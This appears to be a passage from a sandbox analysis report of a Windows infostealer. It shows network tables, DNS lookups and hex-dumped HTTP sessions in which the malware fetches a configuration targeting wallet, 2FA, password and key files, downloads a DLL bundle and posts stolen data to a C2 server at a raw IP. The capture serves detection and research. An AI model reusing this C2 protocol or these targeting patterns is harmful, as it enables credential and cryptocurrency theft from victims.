May 16, 2022 10:29:54.000600100 CEST	49773	443	192.168.2.5	185.199.108.133
May 16, 2022 10:29:54.000623941 CEST	443	49773	185.199.108.133	192.168.2.5
May 16, 2022 10:30:07.547419071 CEST	80	49771	140.82.121.3	192.168.2.5
May 16, 2022 10:30:07.547569990 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:30:08.237725973 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:30:08.237881899 CEST	49771	80	192.168.2.5	140.82.121.3
May 16, 2022 10:30:10.823514938 CEST	49784	80	192.168.2.5	34.117.59.81
May 16, 2022 10:30:10.841507912 CEST	80	49784	34.117.59.81	192.168.2.5
May 16, 2022 10:30:10.842441082 CEST	49784	80	192.168.2.5	34.117.59.81
May 16, 2022 10:30:10.866882086 CEST	49784	80	192.168.2.5	34.117.59.81
May 16, 2022 10:30:10.885030031 CEST	80	49784	34.117.59.81	192.168.2.5
May 16, 2022 10:30:10.992515087 CEST	80	49784	34.117.59.81	192.168.2.5
May 16, 2022 10:30:10.992645025 CEST	49784	80	192.168.2.5	34.117.59.81
May 16, 2022 10:30:11.400628090 CEST	49785	80	192.168.2.5	149.154.167.220
May 16, 2022 10:30:11.426101923 CEST	80	49785	149.154.167.220	192.168.2.5
May 16, 2022 10:30:11.426341057 CEST	49785	80	192.168.2.5	149.154.167.220
May 16, 2022 10:30:11.426740885 CEST	49785	80	192.168.2.5	149.154.167.220
May 16, 2022 10:30:11.452013969 CEST	80	49785	149.154.167.220	192.168.2.5
May 16, 2022 10:30:11.452060938 CEST	80	49785	149.154.167.220	192.168.2.5
May 16, 2022 10:30:11.452274084 CEST	49785	80	192.168.2.5	149.154.167.220
May 16, 2022 10:30:12.950894117 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:12.950934887 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:12.951050997 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:12.976394892 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:12.976418972 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.077362061 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.077491999 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.528440952 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.528492928 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.528903008 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.529264927 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.532063007 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.572495937 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.579909086 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.579996109 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:13.580120087 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.590790987 CEST	49786	443	192.168.2.5	149.154.167.220
May 16, 2022 10:30:13.590811014 CEST	443	49786	149.154.167.220	192.168.2.5
May 16, 2022 10:30:14.390559912 CEST	49784	80	192.168.2.5	34.117.59.81
May 16, 2022 10:30:14.390732050 CEST	49785	80	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 10:29:36.660388947 CEST	59661	53	192.168.2.5	8.8.8.8
May 16, 2022 10:29:36.676115990 CEST	53	59661	8.8.8.8	192.168.2.5
May 16, 2022 10:29:52.483654976 CEST	57278	53	192.168.2.5	8.8.8.8
May 16, 2022 10:29:52.502888918 CEST	53	57278	8.8.8.8	192.168.2.5
May 16, 2022 10:29:52.824187994 CEST	53757	53	192.168.2.5	8.8.8.8
May 16, 2022 10:29:52.842402935 CEST	53	53757	8.8.8.8	192.168.2.5
May 16, 2022 10:30:10.791815996 CEST	60969	53	192.168.2.5	8.8.8.8
May 16, 2022 10:30:10.809566975 CEST	53	60969	8.8.8.8	192.168.2.5
May 16, 2022 10:30:11.372055054 CEST	62929	53	192.168.2.5	8.8.8.8
May 16, 2022 10:30:11.389916897 CEST	53	62929	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 16, 2022 10:29:36.660388947 CEST	192.168.2.5	8.8.8.8	0x5a4e	Standard query (0)	t.me	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.483654976 CEST	192.168.2.5	8.8.8.8	0x457d	Standard query (0)	github.com	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.824187994 CEST	192.168.2.5	8.8.8.8	0xb076	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)
May 16, 2022 10:30:10.791815996 CEST	192.168.2.5	8.8.8.8	0x5092	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
May 16, 2022 10:30:11.372055054 CEST	192.168.2.5	8.8.8.8	0xd519	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 16, 2022 10:29:36.676115990 CEST	8.8.8.8	192.168.2.5	0x5a4e	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.502888918 CEST	8.8.8.8	192.168.2.5	0x457d	No error (0)	github.com	140.82.121.3	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.842402935 CEST	8.8.8.8	192.168.2.5	0xb076	No error (0)	objects.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.842402935 CEST	8.8.8.8	192.168.2.5	0xb076	No error (0)	objects.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.842402935 CEST	8.8.8.8	192.168.2.5	0xb076	No error (0)	objects.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)
May 16, 2022 10:29:52.842402935 CEST	8.8.8.8	192.168.2.5	0xb076	No error (0)	objects.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)
May 16, 2022 10:30:10.809566975 CEST	8.8.8.8	192.168.2.5	0x5092	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)
May 16, 2022 10:30:11.389916897 CEST	8.8.8.8	192.168.2.5	0xd519	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

github.com

objects.githubusercontent.com

api.telegram.org

116.202.0.187

ipinfo.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49753	149.154.167.99	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49772	140.82.121.3	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49773	185.199.108.133	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49786	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49756	116.202.0.187	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2022 10:29:37.542433977 CEST	475	OUT	GET / HTTP/1.1 Host: 116.202.0.187
May 16, 2022 10:29:37.632414103 CEST	487	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 08:29:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
May 16, 2022 10:29:37.745793104 CEST	527	OUT	GET /1199 HTTP/1.1 Host: 116.202.0.187 Connection: Keep-Alive Cache-Control: no-cache
May 16, 2022 10:29:37.838203907 CEST	527	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 08:29:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 61 0d 0a 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 32 35 30 2c 44 65 66 61 75 6c 74 3b 25 44 45 53 4b 54 4f 50 25 5c 3b 2a 2e 74 78 74 3a 2a 2e 64 61 74 3a 2a 77 61 6c 6c 65 74 2a 2e 2a 3a 2a 32 66 61 2a 2e 2a 3a 2a 62 61 63 6b 75 70 2a 2e 2a 3a 2a 63 6f 64 65 2a 2e 2a 3a 2a 70 61 73 73 77 6f 72 64 2a 2e 2a 3a 2a 61 75 74 68 2a 2e 2a 3a 2a 67 6f 6f 67 6c 65 2a 2e 2a 3a 2a 75 74 63 2a 2e 2a 3a 2a 55 54 43 2a 2e 2a 3a 2a 63 72 79 70 74 2a 2e 2a 3a 2a 6b 65 79 2a 2e 2a 3b 35 30 3b 74 72 75 65 3b 6d 6f 76 69 65 73 3a 6d 75 73 69 63 3a 6d 70 33 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: ba1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;.txt:.dat:wallet.:2fa.:backup.:code.:password.:auth.:google.:utc.:UTC.:crypt.:key.*;50;true;movies:music:mp3;0
May 16, 2022 10:29:37.841936111 CEST	527	OUT	GET /update.zip HTTP/1.1 Host: 116.202.0.187 Cache-Control: no-cache
May 16, 2022 10:29:37.862175941 CEST	529	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 08:29:37 GMT Content-Type: application/zip Content-Length: 1565849 Last-Modified: Wed, 13 Apr 2022 20:23:38 GMT Connection: keep-alive ETag: "6257314a-17e499" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b e9 b5 00 00 48 47 01 00 10 00 00 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c ec fd 0b 40 54 d5 d7 30 0e 9f 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 10 02 c1 39 a8 29 8a 0e 94 e3 69 ca 5f 59 59 59 69 5a 3f 2b 2b bb 99 99 19 88 09 98 29 5e 2a 4b 2b 34 ab 83 43 8a 46 80 4a ce b7 d6 3e 67 60 50 e9 79 9e f7 ff 3e ff f7 7b bf ef 41 f7 39 fb ba f6 da 6b af b5 f6 da fb ec bd 27 61 e1 16 4a 4c 51 94 04 9c cd 46 51 07 28 fe 2f 8a fa 8f ff 5a c0 79 8c 38 e8 41 7d d4 e7 eb 91 07 44 b3 be 1e 39 cf 98 5b a2 2c 2a 2e 5c 5e 9c b1 42 99 99 51 50 50 48 2b 97 65 2b 8b 99 02 65 6e 81 32 76 4e 92 72 45 61 56 f6 64 77 77 37 5f 01 86 e8 d6 ae d9 fa 6d 5f 0f b3 bb 1b 92 51 c3 a6 c1 7b 56 e3 92 61 b3 49 dc 89 61 f9 f0 de 7e bb de 27 99 bc 4f fa a4 90 77 9d 4f 34 79 7f e9 93 4e de 5f fb c4 92 b7 7a 18 ff 3e 45 c2 73 73 33 8d 08 d7 8e b3 41 4f 51 b3 44 ce 94 2c 64 dc 02 7b 5c 23 35 6a 64 5f 91 47 5f ea 2a 04 94 42 e4 bb e0 14 04 43 8a f8 d0 ef 44 51 2e f0 72 a3 f8 37 f9 8b 12 11 e2 1d ea e7 04 74 8c 8a 26 85 14 14 d5 fd e6 5f fb 80 58 9e 7d 28 aa 4a 21 a2 9e c0 48 a5 88 92 4a 1c 88 29 15 51 f1 91 f0 56 89 a8 ad 50 c1 be 11 14 15 42 f5 fe c7 8d b8 a7 8f 00 ee a1 7f c8 3f 99 ce 5e 45 c3 fb 68 93 80 d0 55 a1 d3 1d fe a0 e9 4b 27 67 65 d0 19 e0 8f 25 0d 14 91 36 53 d7 1c 73 91 7a ab 26 e7 f2 19 0f 38 f3 75 13 82 b4 dc 97 2f 6a 72 71 49 71 26 36 4f 82 15 08 f9 da 1e 94 2f 3b bf 30 93 22 6d 47 1a 50 32 78 77 de 97 2f 86 fa 9f bf ff ad 7f 45 63 e1 d1 00 0f 51 0b fa b6 8c 43 3a 8f c7 b8 87 30 d9 0f 45 06 1f 5b f0 b1 03 1f fb f0 51 85 8f 06 7c 28 27 62 87 e1 23 0a 1f 8d f8 50 4c c2 54 7c 50 93 31 88 8f a5 f8 68 51 63 89 00 8a e2 99 5b 15 8a f0 c2 30 a8 43 1f 3e a8 70 2c 11 81 25 f0 51 85 8f 46 7c 50 28 1d e5 f8 58 8a 8c 5f 14 8b 09 f8 a0 f4 58 39 3e 8a 88 2f 0e 71 c6 c7 52 7c 6c c1 07 35 0d eb c5 47 14 3e 96 e2 43 35 1d e1 cd 44 4c f1 d1 82 0f 6a 16 e6 c3 47 14 3e ca 49 30 01 d1 c0 47 d1 9b 18 87 8f 2d f8 d8 87 8f 2a e2 7b 0b f3 bd 8d 40 f1 11 85 8f a5 f8 28 22 c1 bd 58 02 1f 0d 7b ed 9a 65 3c 3c 44 1d f8 90 ec 83 87 6a 1f 82 c2 87 f4 7d 2c fb 01 12 1b 1f ca 0f 11 28 3e 12 f1 f1 1c 3e a8 8f a1 44 d1 7e 24 d3 67 48 83 06 04 7f 1a 83 df a1 ef 22 36 e6 47 2c fb 33 82 6a 44 0c 7e 45 5c f0 b1 f4 37 28 bb 03 1f 0d bf 61 02 87 a0 50 15 18 ac 58 a5 b5 07 6f d8 b5 5f b9 92 52 40 26 85 ca 49 a4 28 07 47 f1 9d ad d8 e3 49 29 ae 80 53 7a 51 0a c5 50 4a e1 0b 2e 0a dc 3c 70 34 b8 bd 10 7f 00 5c 15 b8 13 e0 ce 83 bb 02 ae 05 1c 35 90 52 c8 c0 79 82 f3 01 37 1e 5c 00 b8 88 81 bc d6 8c 82 77 3c 38 03 b8 79 e0 e6 83 5b 0c 6e 29 b8 2c 70 46 70 f9 e0 56 81 5b 0b ae 1c 5c 05 b8 4d e0 9e 00 b7 05 dc 56 70 db c0 6d 07 b7 03 dc 6e 70 7b c0 ed 05 b7 0f dc 47 e0 0e 80 3b 04 ae 0a dc 51 70 75 e0 4e 80 6b 00 77 0e dc 79 70 17 c1 35 82 bb 02 8e 03 d7 0c ae 05 5c 2b e2 3a 08 da 01 ce 13 9c 12 5c 08 b8 58 70 f3 c1 ad 02 b7 0d dc 01 70 e7 c1 75 80 f3 f1 86 3c e0 16 83 5b 0b 6e 37 b8 2a 70 0d e0 ce 81 bb 08 ae 19 9c 62 30 a5 f0 06 e7 0b 2e 00 9c 01 5c 11 b8 6d e0 aa c0 71 e0 3c 87 40 9f 80 9b 07 6e 15 b8 dd e0 1a c0 35 83 eb 1c c2 d3 32 b9 e0 e1 82 c2 95 05 ca ec 55 99 d9 45 74 6e 61 01 d0 76 59 46 56 8f 70 74 66 66 76 49 89 b2 34 b7 30 3f 03 a3 94 93 94 05 85 ca b9 f3 e6 4d 57 a2 92 Data Ascii: PKnUSKHGvcruntime140.dll@T0aq`FEEoe>U"89)i_YYYiZ?++)^K+4CFJ>g`Py>{A9k'aJLQFQ(/Zy8A}D9[,.\^BQPPH+e+en2vNrEaVdww7_m_Q{VaIa~'OwO4yN_z>Ess3AOQD,d{\#5jd_G_BCDQ.r7t&_X}(J!HJ)QVPB?^EhUK'ge%6Ssz&8u/jrqIq&6O/;0"mGP2xw/EcQC:0E[Q\|('b#PLT\|P1hQc[0C>p,%QF\|P(X_X9>/qR\|l5G>C5DLjG>I0G-{@("X{e<<Dj},(>>D~$gH"6G,3jD~E\7(aPXo_R@&I(GI)SzQPJ.<p4\5Ry7\w<8y[n),pFpV[\MVpmnp{G;QpuNkwyp5\+:\Xppu<[n7*pb0.\mq<@n52UEtnavYFVptffvI40?MW
May 16, 2022 10:29:37.862196922 CEST	530	IN	Data Raw: 1f 89 fd 11 4d d3 d9 2b 8a e8 ec 2c 65 86 92 5e 5d 94 9d 9b a5 2c cc 51 16 30 f9 f9 45 74 b1 b2 a8 30 b7 80 ce 2e 86 9c 31 00 bb 38 3b 23 cb 1e f5 20 58 98 27 6b 75 41 c6 8a dc cc f4 cc 8c 12 1a 23 33 4b 56 34 8a ba d9 8e d8 24 4a e7 67 06 db c3 Data Ascii: M+,e^],Q0Et0.18;# X'kuA#3KV4$JgTKMVP%\xgRT1YbOS-VCL&e">L`3PBAvD=-Ng?^Kf>=\|IUDNO_Q5"\|xe@)>>`
May 16, 2022 10:29:37.862210035 CEST	532	IN	Data Raw: 0f 57 c4 f2 f0 1d 28 84 ff 0b 7f bd fd a9 a0 9e ad 4a aa 0b 1e da bf bb 21 bc 57 88 c3 74 7b 9a cd 86 ab 95 fc 1a 18 96 c9 82 34 d1 03 d2 a2 46 52 3d f0 c3 7c f7 c6 55 40 9c 0a e2 2a 7a 81 8f 69 b2 7b ca 60 5d e3 1d e2 b0 2f 0c 10 ae 53 76 e7 ad Data Ascii: W(J!Wt{4FR=\|U@*zi{`]/Sv+>~Tw>P;qN=gU6Ggw/8<L;ziA';;w6\G,g)\|PE!;x'Nqk1#{hS!z0]tU/p8^
May 16, 2022 10:29:37.862225056 CEST	533	IN	Data Raw: 1b 00 60 3e d1 54 a5 13 6e b4 5d 76 e4 47 ec ed 64 69 0a 2b 62 1f 91 88 8f 54 b6 ad 72 67 a7 4b 59 cf 81 ac cc 4d 7c 52 5c bd c4 81 7b 49 fe c4 c4 14 16 1a 3d 96 e2 64 c3 81 3d a3 14 80 fa 14 36 de 07 50 1d df 26 52 d0 6e 6c 94 37 0b f1 9d d6 a1 Data Ascii: `>Tn]vGdi+bTrgKYM\|R\{I=d=6P&Rnl7N;xw,0h0BjpGPTaZa4QUk\rXY%VV(S3gWx>{8t#!d!s=hC37ecp7Nyr$
May 16, 2022 10:29:37.862282991 CEST	534	IN	Data Raw: 2b af b4 fe 0d c3 f4 49 6e b9 2b e9 6e 03 77 08 24 9e fb 04 1f 1f c0 c3 0c ec f6 16 bc 4d 65 3e d0 6f ad 29 e6 78 4f 26 da c6 b4 58 23 51 2b a7 cb 4a 47 84 a4 79 ca 2b df 00 20 44 8c bc 0d 88 7c 22 00 5c c6 4b 11 97 3f 90 70 9a bc 72 23 e4 01 81 Data Ascii: +In+nw$Me>o)xO&X#Q+JGy+ D\|"\K?pr#"c?]~Eoj(;?t&{;MuA}%h3"T9uC$\^[#R?URQ6x~dERC$f'l$HI#)?g9kd?X4(N![w %t"M
May 16, 2022 10:29:37.862301111 CEST	536	IN	Data Raw: 06 6b 8c 3d 8b 3d 84 a6 07 98 5a e6 84 16 33 d8 0a 75 ac be 05 ec 26 30 33 c1 8a 88 66 f5 cd c4 6a e3 d8 69 12 f1 11 e8 3b 1b c3 d9 fc 0d 1c 75 db 66 e3 6d 91 c1 60 31 c0 90 1d 6f aa 96 90 32 50 16 2c 91 f5 df 59 9d 3e 14 c1 20 02 e6 87 e9 88 c2 Data Ascii: k==Z3u&03fji;ufm`1o2P,Y> i&b^K_fH'=P:g-@(VAHDQy9k80=q^jAI0:T0#X8*+pd[Ms[9x~q&(`9wbL}6\|%e`6
May 16, 2022 10:29:37.862319946 CEST	537	IN	Data Raw: 38 24 6c 03 45 08 2b af 34 81 67 73 b2 8d 3d e5 97 d0 a2 4d 68 96 3f 6e c6 7d 01 67 e8 47 a0 2f 81 a6 51 60 a7 31 43 01 13 c5 e6 38 a0 57 db f9 21 55 6d 0d a3 1a a0 a1 2c d3 fa be c8 3a 16 5e 6c 1c 4f d2 4d 6c 14 18 dc d5 4d 4e 90 ef 74 f9 25 c7 Data Ascii: 8$lE+4gs=Mh?n}gG/Q`1C8W!Um,:^lOMlMNt%PYQOhP&>DA1M[vMhaM%}N^ R(%`bN]i-6F<"I\|l`kH{&+{]oImEWT1'Xl^d}e[pRk:@1JEID
May 16, 2022 10:29:37.862376928 CEST	539	IN	Data Raw: c1 72 02 67 23 2e f0 f2 4c 8b cb a7 ec 49 fe 4b 02 b7 6e 3b c1 4a 26 7c 58 f0 ca 07 a0 4b ee 19 5f f8 e5 56 92 3c 51 21 7c b6 ef 99 0e 29 e3 85 94 9e f9 55 f7 e5 4f e1 16 22 07 b7 08 ea ed ee 4b bc 7a db 6e 57 f2 b8 3d 0b fb 8a 4c a2 1b 47 f0 ca Data Ascii: rg#.LIKn;J&\|XK_V<Q!\|)UO"KznW=LGk<"lK=B9r@[<AX$l^{TVskngZpK%'wa,N@r,p"K[YrhQS.%\l#)5m50qw!$s8Z
May 16, 2022 10:29:37.862396955 CEST	540	IN	Data Raw: 22 ee df 31 70 5f ce 05 3c 37 41 35 c6 a3 43 f1 7b fd 5c 52 12 59 da d3 3a 90 c4 11 45 f5 0a 1f 3f 11 02 01 c8 6d c6 ba a1 38 fd 85 9c 06 2e 6c 26 f6 4c 1d b7 00 ba d9 40 72 bf 0a 0a d9 1a 54 5e 26 a5 68 ef f2 3b 51 cc 80 6e 4a c7 f1 ed b0 7a 27 Data Ascii: "1p_<7A5C{\RY:E?m8.l&L@rT^&h;QnJz'"3M(h3{4p:9}/rvV\="}v-{[Bh^q;cpj*<l~mv\|:W\ q 9yF
May 16, 2022 10:29:37.862530947 CEST	541	IN	Data Raw: 6f 81 31 b6 e2 02 1d 60 ca 3e 8a 7b 39 4d d9 75 50 ec 68 9e c8 70 4c df b9 88 a3 66 60 21 7d 85 01 e2 b8 7d a4 54 85 fa 02 96 db 04 e5 04 86 83 c9 ce cd ae c9 8e fc 30 28 42 5f 79 c5 09 27 41 23 a6 13 cf 10 79 c5 2b d0 bc 78 12 35 8b 44 49 e5 15 Data Ascii: o1`>{9MuPhpLf`!}}T0(B_y'A#y+x5DIsQLU0+e+yZt!N%##V_7?}XW?j*LoV4-{:&lX^sB%\|)cK;s$xYXf9i
May 16, 2022 10:29:37.882395029 CEST	543	IN	Data Raw: b4 19 72 e9 7c 19 ef e8 10 11 3d c0 ae 38 9e e0 9e 47 ad 8f fb e6 75 60 14 fc 4a 84 f3 28 b7 16 8c bf ee d5 19 fe cb a1 7d 85 66 6d 9e 02 77 8a 62 36 bc 67 0f fd f7 2d cf c4 6f 24 cb 33 60 8d ba 18 c8 90 e2 60 20 18 15 80 3b f7 4c 18 a9 29 11 06 Data Ascii: r\|=8Gu`J(}fmwb6g-o$3`` ;L){(aTeZH~mpfvp'af{8!Ns:$o7ej?Sh>t?:Vt$!+*/bMT2pK"`a//
May 16, 2022 10:29:51.923477888 CEST	2673	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4CPROSXMVQCDF92U Host: 116.202.0.187 Content-Length: 126869 Connection: Keep-Alive Cache-Control: no-cache
May 16, 2022 10:29:51.923660040 CEST	2686	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 43 50 52 4f 53 58 4d 56 51 43 44 46 39 32 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 72 6f 66 69 6c 65 22 0d 0a 0d 0a 31 31 39 39 0d 0a 2d 2d Data Ascii: ------4CPROSXMVQCDF92UContent-Disposition: form-data; name="profile"1199------4CPROSXMVQCDF92UContent-Disposition: form-data; name="profile_id"0------4CPROSXMVQCDF92UContent-Disposition: form-data; name="hwid"d06ed635-68f
May 16, 2022 10:29:51.944338083 CEST	2702	OUT	Data Raw: 37 6d 6e 62 51 52 55 41 5a 58 7a 2b 78 38 55 6a 6d 4c 49 36 6f 4b 63 57 61 43 4a 2b 37 56 6c 61 72 4b 76 38 59 66 48 57 6a 4b 2f 71 6c 66 62 70 59 34 4b 6d 75 37 4a 76 62 2f 42 69 72 67 72 66 2b 52 35 7a 6a 4c 47 4f 75 66 5a 59 61 53 55 61 64 49 Data Ascii: 7mnbQRUAZXz+x8UjmLI6oKcWaCJ+7VlarKv8YfHWjK/qlfbpY4Kmu7Jvb/Birgrf+R5zjLGOufZYaSUadIa/sbRJBkzBmCMXnuwTbv5Q5jks8bA6ybA6y8430TwGaM/7GTbBsSnFeUkyT9m3yMqNcN/bXcuvv1VI3q6Gfed9hZWofjHcrKHQlzsfs238kfKAVe1XRHu/hfJa6362vrhDZ83YBL+vuM4kf8mQQBP8wTYm1zQEaK8
May 16, 2022 10:29:51.944401026 CEST	2713	OUT	Data Raw: 57 6d 41 6f 48 46 58 44 70 41 72 43 75 38 76 7a 46 75 6a 6f 33 6a 45 38 50 74 61 77 6d 41 30 58 79 61 2b 41 6e 2b 61 4f 4d 54 4c 51 35 31 42 42 2b 4f 4b 77 50 4b 63 50 38 77 2f 56 41 70 79 52 63 38 6c 68 31 4c 73 42 33 34 5a 58 70 4b 42 50 74 62 Data Ascii: WmAoHFXDpArCu8vzFujo3jE8PtawmA0Xya+An+aOMTLQ51BB+OKwPKcP8w/VApyRc8lh1LsB34ZXpKBPtbyVP7Olt1TH2uS9cKDez7FVRwrg8C3EehZlQtwufNHmi+kQRyibSrQT9G6GpL2N9eQoif354oOSfxvQ68ijxwq67b3MjZt1nMAUetnw56jJwxUQ1IPHUyu3m79ulHqEG/TsX1SS7HWs/KpbM2If5XCPvmP02fSJR1q
May 16, 2022 10:29:51.964828968 CEST	2736	OUT	Data Raw: 53 54 64 45 53 32 7a 69 78 72 4f 47 76 6f 57 45 59 66 6c 4b 64 56 33 59 79 4c 51 48 41 56 51 2f 31 4f 66 49 6e 74 73 4b 66 39 64 34 2b 74 50 70 4a 50 46 49 73 37 2f 71 45 52 54 71 70 59 47 54 52 68 51 47 31 33 67 49 6c 31 45 38 61 48 59 32 45 46 Data Ascii: STdES2zixrOGvoWEYflKdV3YyLQHAVQ/1OfIntsKf9d4+tPpJPFIs7/qERTqpYGTRhQG13gIl1E8aHY2EFRYy5byRJflaEqnc1+jv+OXJeZcjNfTG+lJg56VdfEWNaqFBbtjSS63mKldeM3riL2NHwgnNq3LdhcdxEWGSbZ40ngrxb3/ZWXlWP3z5FzrgMPglcvT1M3XXK7IEed4LwnSOpvqIJj+aK6s8RmbNxOPKK5bhi4jGH8
May 16, 2022 10:29:51.965063095 CEST	2759	OUT	Data Raw: 6d 6f 38 6e 41 59 53 47 4b 59 56 37 6f 4c 63 31 78 2f 4c 67 78 37 43 63 32 56 48 4f 67 38 55 53 7a 77 45 43 4b 32 53 52 62 65 6b 41 43 56 52 47 7a 6d 6f 4c 50 55 30 47 4b 70 51 49 38 6b 76 6d 35 51 64 54 45 45 46 52 30 4a 6a 58 77 64 74 36 72 4e Data Ascii: mo8nAYSGKYV7oLc1x/Lgx7Cc2VHOg8USzwECK2SRbekACVRGzmoLPU0GKpQI8kvm5QdTEEFR0JjXwdt6rNnbpPoSK8Q5i6Rxx0m++WzjQwHJRUGJ1Dei6arkGvJ7gvQZ4B3ysVQhs0uBB537TE6aUhBgqhhlq4gfNsCrwlqEesMc7nwtoqMpGypMHvpnlCFLsgqbskL/k2YAKfKiXaHS+BjxOTjhS6Gn8rTBeMd50v7MPsUCLJa
May 16, 2022 10:29:51.965106964 CEST	2764	OUT	Data Raw: 50 2f 75 45 57 2b 6c 30 2f 43 57 72 45 2f 67 75 34 38 41 51 2f 57 61 34 78 69 50 51 42 78 6c 2f 58 64 75 70 77 62 72 45 6c 54 6b 72 36 34 69 63 42 39 6b 73 63 5a 51 34 2f 4e 6a 56 61 6e 48 78 64 35 7a 45 52 76 36 35 38 66 57 47 79 5a 4c 46 32 30 Data Ascii: P/uEW+l0/CWrE/gu48AQ/Wa4xiPQBxl/XdupwbrElTkr64icB9kscZQ4/NjVanHxd5zERv658fWGyZLF20bxo1vvzbjG7sC31jdyBkmb6FP+9FjRZ6LuvYHehfE9QafZFO3etWdgO6yGgAjOK3Kl0gq+riWw9JSbIg1GOuXZfs5uvDrVHn2+c7xn+lXkAvFhoNjofMW90dvxI+2IiFtZY51G45V1r/uYXfnFFNJIB4xWcTPr4Z/
May 16, 2022 10:29:51.985419035 CEST	2787	OUT	Data Raw: 43 74 41 6e 30 32 49 74 49 51 45 4b 58 34 67 54 45 34 42 5a 68 76 77 68 53 4d 4e 62 69 62 50 6a 67 74 30 4f 34 50 30 43 4e 4d 66 70 44 2f 49 43 48 64 6e 65 4a 41 6f 52 4d 73 4b 63 34 58 78 66 31 6f 68 52 6a 6c 30 39 66 4a 48 48 44 72 69 4c 61 4e Data Ascii: CtAn02ItIQEKX4gTE4BZhvwhSMNbibPjgt0O4P0CNMfpD/ICHdneJAoRMsKc4Xxf1ohRjl09fJHHDriLaNRTLrERQ+lal36A3SrkLtP9/hZ9YHKw/M7RhHvbrPINbCoGAdDW8lT9Dgacn/5cTOWVFySgXeqfytQiITghh6XkBxjiMUYy153bNHZ/sKODW7/VTuXBLfld/+b900qIOauNf/4KFqczjqnQ8UjBpLHKRBntOaBoBo5
